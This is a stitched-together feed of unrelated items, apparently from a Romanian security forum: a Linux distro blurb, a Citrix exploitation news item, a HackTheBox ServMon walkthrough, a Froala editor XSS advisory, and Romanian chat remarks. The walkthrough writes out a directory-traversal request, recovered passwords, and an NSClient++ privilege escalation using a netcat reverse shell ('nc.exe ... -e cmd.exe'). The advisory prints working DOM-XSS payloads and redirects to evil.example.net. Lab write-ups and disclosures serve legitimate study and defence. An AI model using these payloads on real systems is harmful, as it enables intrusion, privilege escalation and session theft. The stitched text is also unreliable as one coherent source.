DarkOs DarkOs An Arch Based Distro | Status: Beta | Brought to you by: ybenel Dark OS Is A Linux Operating System Based On Arch Linux, Designed To Create More Enjoyable User Experience And Easy To Use . It Comes With 3 Editions (One Hell - Soopertrack - Schmedding), Each Edition Has It's Own Desktop / Window Manager And Package List. DarkOs "One Hell" Edition Comes With Plasma Desktop Environment And Minimal Amount Of Packages . DarkOs "Soopertrack" Edition Comes With No Desktop Or Window Manager But Uses LXDE As Temporarily Environment To Provide You With The Installer And It'll Be Removed Once The Installation Is Finished,It Also Comes With No Essential Packages Such As (Browser , Text Editor , Terminal ...etc) So You'll Get To Choose What You Want. DarkOs "Schmedding" Comes With No Desktop Or Window Manager Nor An Installer And Has No Packages So You Could Enjoy The Experience As If You Were Installing Arch Linux . Features Minimal And Easy Gives You Full Control Customize What You Want Enjoy Using Linux Similar To Arch Linux (80%) Choose What's Perfect For You Screenshot: Download Source: https://sourceforge.net/projects/darkos-arch/

Earlier this week, Citrix released security updates for Citrix Application Delivery Controller (ADC), Citrix Gateway, and the Citrix SD-WAN WANOP appliance, and urged admins to apply them as soon as possible to reduce risk. At the time, there was no public attack code and no indication that any of the fixed flaws were getting actively exploited. On Thursday, though, SANS ISC’s Dr. Johannes Ullrich spotted attackers attempting to exploit two of the Citrix vulnerabilities on his F5 BigIP honeypot (set up to flag CVE-2020-5902 exploitation attempts). About the vulnerabilities The fixed flaws are 11 in total, ranging from information disclosure and DoS bugs to elevation of pivelege, XSS and code injection flaws. He also pointed out that of the 11 vulnerabilities, there are six possible attacks routes, and five of those have barriers to exploitation. Finally, he added that the vulnerabilities have no link to CVE-2019-19781, the remote code execution flaw that’s been heavily exploited by attackers since late December/early January. About the recent exploitation attempts Dr. Ullrich said that they are seeing some scans that are looking for systems that haven’t been patched yet. One of the exploited vulnerabilities allows arbitrary file downloads, the other allows retrieval of a PCI-DSS report without authentication. Via helpnetsecurity.com

nu am citit articolul complet, dar presimt in loc de bere mici, mustar, vor avea internet gratuit, cat despre vulnerabilitati, vor vota toti nepotii

ServMon retired today. ServMon is a easy-rated windows machine on HackTheBox platform. It’s IP is 10.10.10.184. Feel free to check out my hackthebox profile yky4u. Respect me if I helped you. Let’s begin! Enumeration Let’s do a nmap scan on 10.10.10.184, -sC for default script, -sV for version detection, -p- for full ports. [root@H0ST: ~/HTB/servmon]$ nmap -sC -sV -p- 10.10.10.184 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 12:15 BST Nmap scan report for 10.10.10.184 Host is up (0.086s latency). Not shown: 65517 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_01-18-20 12:05PM <DIR> Users | ftp-syst: |_ SYST: Windows_NT 22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0) | ssh-hostkey: | 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA) | 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA) |_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519) 80/tcp open http | fingerprint-strings: | GetRequest, HTTPOptions, RTSPRequest: | HTTP/1.1 200 OK | Content-type: text/html | Content-Length: 340 | Connection: close | AuthInfo: | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | <html xmlns="http://www.w3.org/1999/xhtml"> | <head> | <title></title> | <script type="text/javascript"> | window.location.href = "Pages/login.htm"; | </script> | </head> | <body> | </body> | </html> | NULL: | HTTP/1.1 408 Request Timeout | Content-type: text/html | Content-Length: 0 | Connection: close |_ AuthInfo: |_http-title: Site doesn't have a title (text/html). 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5040/tcp open unknown 5666/tcp open tcpwrapped 6063/tcp open tcpwrapped 6699/tcp open napster? 8443/tcp open ssl/https-alt | fingerprint-strings: | FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: | HTTP/1.1 404 | Content-Length: 18 | Document not found | GetRequest: | HTTP/1.1 302 | Content-Length: 0 | Location: /index.html | workers |_ jobs | http-title: NSClient++ |_Requested resource was /index.html | ssl-cert: Subject: commonName=localhost | Not valid before: 2020-01-14T13:24:20 |_Not valid after: 2021-01-13T13:24:20 |_ssl-date: TLS randomness does not represent time 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.80%I=7%D=6/19%Time=5EEC9EC4%P=x86_64-pc-linux-gnu%r(NULL SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\. SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\ SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20 SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2 SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n") SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\ SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\ SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1 SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\ SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20 SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\ SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1- SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2 SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\ SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=6/19%Time=5EEC9ECC%P=x86_64-pc-linux-gn SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 SF:\0\0\0\0\0\0\x12\x02\x18\0\x1aE\n\x07workers\x12\x0b\n\x04jobs\x12\x03\ SF:x18\xc0\x04\x12")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length: SF:\x2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1 SF:\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r SF:(RTSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocum SF:ent\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Leng SF:th:\x2018\r\n\r\nDocument\x20not\x20found"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 3m20s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-06-19T11:23:21 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 315.00 seconds FTP allows anonymous login on port 21. We discovered two users and two interesting files. Let’s download it and see what it is. Nadine — Confidential.txt [root@H0ST: ~/HTB/servmon]$ cat Confidential.txt Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nathan — Notes to do.txt [root@H0ST: ~/HTB/servmon]$ cat 'Notes to do.txt' 1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint There is a web application NVMS-1000 on port 80, which has a directory traversal vulnerability. Exploit can be found on exploit-db. NVMS-1000-Directory-Traversal Let’s have a look at the exploit # Title: NVMS-1000 - Directory Traversal # Date: 2019-12-12 # Author: Numan Türle # Vendor Homepage: http://en.tvt.net.cn/ # Version : N/A # Software Link : http://en.tvt.net.cn/products/188.html POC --------- GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: 12.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close Response --------- ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 Let’s try to retrieve files on Nathan’s Desktop using directory traversal vulnerability. We found seven passwords in a file named Password.txt. Here are the passwords. 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$ We need to find out the correct credentials. We can do it by using crackmapexec or hydra. Valid credentials is Nadine:L1k3B1gBut7s@W0rk. We are able to use that credentials to login to SSH. Privilege Escalation NSClient++ web application is running on port 8443. Run the command to obtain the password. Let’s route the traffic from 10.10.10.184:8443 to 127.0.0.1:8443 using SSH. ssh -L 8443:127.0.0.1:8443 Nadine@10.10.10.184 We browsed to http://127.0.0.1:8443 and we can see the web application prompt to ask for password, enter ew2x6SsGTxjRwXOT to login to the application. We can use the NSClient++ 0.5.2.35 — Privilege Escalation exploit. Take a look at what it is: Exploit Author: bzyo Twitter: @bzyo_ Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation Date: 05-05-19 Vulnerable Software: NSClient++ 0.5.2.35 Vendor Homepage: http://nsclient.org/ Version: 0.5.2.35 Software Link: http://nsclient.org/download/ Tested on: Windows 10 x64 Details: When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator's password in cleartext from the configuration file. From here a user is able to login to the web server and make changes to the configuration file that is normally restricted. The user is able to enable the modules to check external scripts and schedule those scripts to run. There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere. Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation. A reboot, as far as I can tell, is required to reload and read the changes to the web config. Prerequisites: To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system. Exploit: 1. Grab web administrator password - open c:\program files\nsclient++\nsclient.ini or - run the following that is instructed when you select forget password C:\Program Files\NSClient++>nscp web -- password --display Current password: SoSecret 2. Login and enable following modules including enable at startup and save configuration - CheckExternalScripts - Scheduler 3. Download nc.exe and evil.bat to c:\temp from attacking machine @echo off c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe 4. Setup listener on attacking machine nc -nlvvp 443 5. Add script foobar to call evil.bat and save settings - Settings > External Scripts > Scripts - Add New - foobar command = c:\temp\evil.bat 6. Add schedulede to call script every 1 minute and save settings - Settings > Scheduler > Schedules - Add new - foobar interval = 1m command = foobar 7. Restart the computer and wait for the reverse shell on attacking machine nc -nlvvp 443 listening on [any] 443 ... connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671 Microsoft Windows [Version 10.0.17134.753] (c) 2018 Microsoft Corporation. All rights reserved. C:\Program Files\NSClient++>whoami whoami nt authority\system Risk: The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System Check the version of NSClient++ by running nscp test. We can confirm it is vulnerable. Let’s create evil.bat and put it in C:\Temp directory. [root@H0ST: ~/HTB/servmon]$ cat evil.bat @echo off c:\temp\nc.exe 10.10.14.23 4444 -e cmd.exe Download evil.bat and nc.exe to the box using PowerShell. Go to scripts, put c:\temp\evil.bat into the Value field to create a script to run evil.bat. Go to Scheduler, and set the Value to interval = 1m Listen on port 4444. Click Control, and click Reload button. We have a reverse shell as nt authority\system now. Source

PatternAnalyzer The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use. This project was created for the "Security of wireless and mobile network communications" class of 2019. ICSD Department of University of Aegean. Download Source

############################################################# # # Product: Froala WYSIWYG HTML Editor # Vendor: Froala # CSNC ID: CSNC-2020-004 # CVE ID: CVE-2019-19935 # Subject: DOM XSS in Froala WYSIWYG HTML Editor # Severity: Medium # Effect: Remotely exploitable # Author: Emanuel Duss <emanuel.duss@compass-security.com> # Date: 2020-07-01 # ############################################################# Introduction ------------ Froala WYSIWYG HTML Editor is a lightweight WYSIWYG HTML Editor written in JavaScript that enables rich text editing capabilities for web applications [1]. Froala sanitizes the user input in order to prevent cross-site scripting attacks [2]. During a web application penetration test, Compass found a DOM-based cross-site scripting (XSS) [3] in the Froala WYSIWYG HTML Editor. HTML code in the editor is not correctly sanitized when inserted into the DOM. This allows an attacker that can control the editor content to execute arbitrary JavaScript in the context of the victim's session. Affected -------- * All versions of the Froala WYSIWYG HTML Editor The issue was found in December 2019 in version 3.0.6 and was still not fixed in July 2020 in version 3.1.1. Technical Summary ----------------- It's possible to perform DOM based XSS in the Froala editor by inserting the `<iframe>` tag and the `srcdoc` attribute into the editor: <iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe> This can be verified by inserting the payload into the "Code View" of the editor. In this case, this is would be a self-XSS because the users would only attack themselves. However, it could be possible that untrusted data from a non-controlled source is loaded into the editor in order to exploit it. An example could be a web application where multiple users can edit the same content using this editor. An attacker can use this to execute own JavaScript code in the session of the victim. This can be abused to read the content of the victim's account, use the session to make further requests to the web application or read the cookies or web storage. Technical Details ----------------- # Correct Behavior According to the Froala tech support page "Why is the <script> tag being removed?", the `<script>` tag is removed in order to prevent possible XSS attacks [2]. Other XSS payloads that use other HTML tags and event handlers are also removed from the DOM before they are inserted. This can be verified using a PoC hosted on `poc.example.net` that inserts potentially untrusted data with a `<script>` tag into the editor: <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/css/froala_style.min.css" rel="stylesheet" type="text/css" /> <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/css/froala_editor.pkgd.min.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/js/froala_editor.pkgd.min.js"></script> <div id="froala-editor"></div> <script> let editor = new FroalaEditor('div#froala-editor', {}, function() { // This data could be loaded from a potentially untrusted source, e.g. from an API via an XMLHttpRequest data = "<s>Hello<\/s><script>console.log(document.domain)<\/script><u>Compass<\/u>"; // Inserting untrusted data into the editor editor.html.set(data); // Show how the untrusted data is embedded into the DOM console.log(editor.html.get()); }) </script> The JavaScript console shows that legit HTML tags like `<s>` or `<u>` were inserted into the DOM but the `<script>` tag was correctly removed (as expected) and therefore the JavaScript was not executed: <p><s>Hello</s><u>Compass</u></p> The same can be done by inserting an `<img>` tag with an `onerror` event handler as an XSS vector: [...] data = "<s>Hello<\/s><img src=x onerror=console.log(document.domain)><u>Compass<\/u>"; [...] The JavaScript console again shows that the legit HTML tags were inserted and also the `<img>` tag, but without the used `onerror` event handler. Therefore, the JavaScript was not executed: <p><s>Hello</s><img src="x" class="fr-fic fr-dii"><u>Compass</u></p> This shows that it's not possible to load and execute common XSS payloads into the editor. # XSS Bypass I tried every event handler from the awesome PortSwigger XSS cheat sheet [4], but all of them were blocked. Thanks to the XSS cheat sheet, I found an HTML tag with an attribute that does not start with `on`, which can execute JavaScript in the origin of the website. This tag was not filtered. It's the `<iframe>` tag with the `srcdoc` attribute. The `srcdoc` attribute specifies the HTML content of the page to show in the inline frame [5]. This can be used to embed JavaScript code. The code runs in the origin of the website where the iframe is embedded. Working XSS payload: [...] data = "<s>Hello<\/s><iframe srcdoc=\"<img src=x onerror=console.log(document.domain)>\"><\/iframe><u>Compass<\/u>"; [...] The JavaScript console shows that the `<iframe>` tag with the `srcdoc` attribute was inserted into the DOM without sanitizing. Also the content of the iframe with the `<img>` tag and the `onerror` event handler was not sanitized. Further, the origin on which PoC website is hosted is printed: <p><s>Hello</s><iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe><u>Compass</u></p> poc.example.net Therefore, this shows that the following XSS payload can be used in order to inject and execute JavaScript into the DOM, which results in a DOM-based XSS: <iframe srcdoc="<img src=x onerror=console.log(document.domain)>"></iframe> Note: The `<img>` tag with the `onerror` event handler is only the data content of the `srcdoc` attribute and no code for the browser. This is rendered into code later when the content of the iframe is built. The injected JavaScript code runs in the origin of the website where the Froala editor is running. The next section explains why I mention this explicitly. XSS with Undefined / Empty Origin --------------------------------- There are several issues marked as open and fixed in the Froala GitHub repository regarding XSS [6]. The closed ones are also not fixed at the moment. However, most of these XSS are running in another origin as the website where the editor is loaded. # Example 1 For example, the issue #3270 [7] that is marked as closed and uses an embedded object (`<embed>` tag) in order to execute JavaScript: [...] data = "<EMBED/SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+Y29uc29sZS5sb2coZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pjwvc3ZnPgo=\">" [....] The base64 decoded payload is an SVG image containing JavaScript: <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss"> <script type="text/ecmascript">console.log(document.domain)</script></svg> The JavaScript console shows that the code is executed but the origin is `undefined`: <p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+Y29uc29sZS5sb2coZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pjwvc3ZnPgo="></p> undefined # Example 2 Another example is the issue #3039 [8] that is marked as closed uses the `<object>` tag to embed HTML / JavaScript code: [...] data = "<object data='data:text/html,<svg onload=console.log(document.domain)>'>"; [...] The JavaScript console shows that the code is executed but the origin is empty: <p><object data="data:text/html,<svg onload=console.log(document.domain)>"></object></p> // empty line # Exploiting XSS with Undefined / Empty Origins Because the origin is not the same as where the PoC is hosted, it's not a typical XSS where an attacker could read the content of the victim's website, use the session to make further requests or access the cookies or web storage. It is however still possible to perform arbitrary redirects to other websites using the reference to the `window.top.location`: [...] data = "<object data='data:text/html,<svg onload=window.top.location=\"http://evil.example.net/\">'>"; [...] This redirects to http://evil.example.net/. The same applies for the embed tag: [...] data = "<EMBED/SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj4KICA8c2NyaXB0PndpbmRvdy50b3AubG9jYXRpb249Imh0dHA6Ly9ldmlsLmV4YW1wbGUubmV0LyI8L3NjcmlwdD4KPC9zdmc+Cg==\">" [...] Decoded base64 payload: <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss"> <script>window.top.location="http://evil.example.net/"</script> </svg> This also redirects to http://evil.example.net/. This is not as nice and powerful as the "real" XSS attack from the beginning, but still something ;-). Vulnerability Classification ---------------------------- CVSS v3.1 Metrics [9]: * CVSS Base Score: 6.1 * CVSS Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Remediation ----------- This XSS issue is not fixed. The vendor can't tell any exact release date for a fixed version. Therefore, only trusted data or data that is already sanitized should be loaded into the editor. # 0day.today [2020-07-05] # Source

Tot Bunicu' tot pe irc, era op pe mai multe #

M-am intalnit recent(anul curent) cu el si mi-a spus ca nu stie daca ne mai vedem, era depresiv(doliu) in caz de vorbim despre aceeasi persoana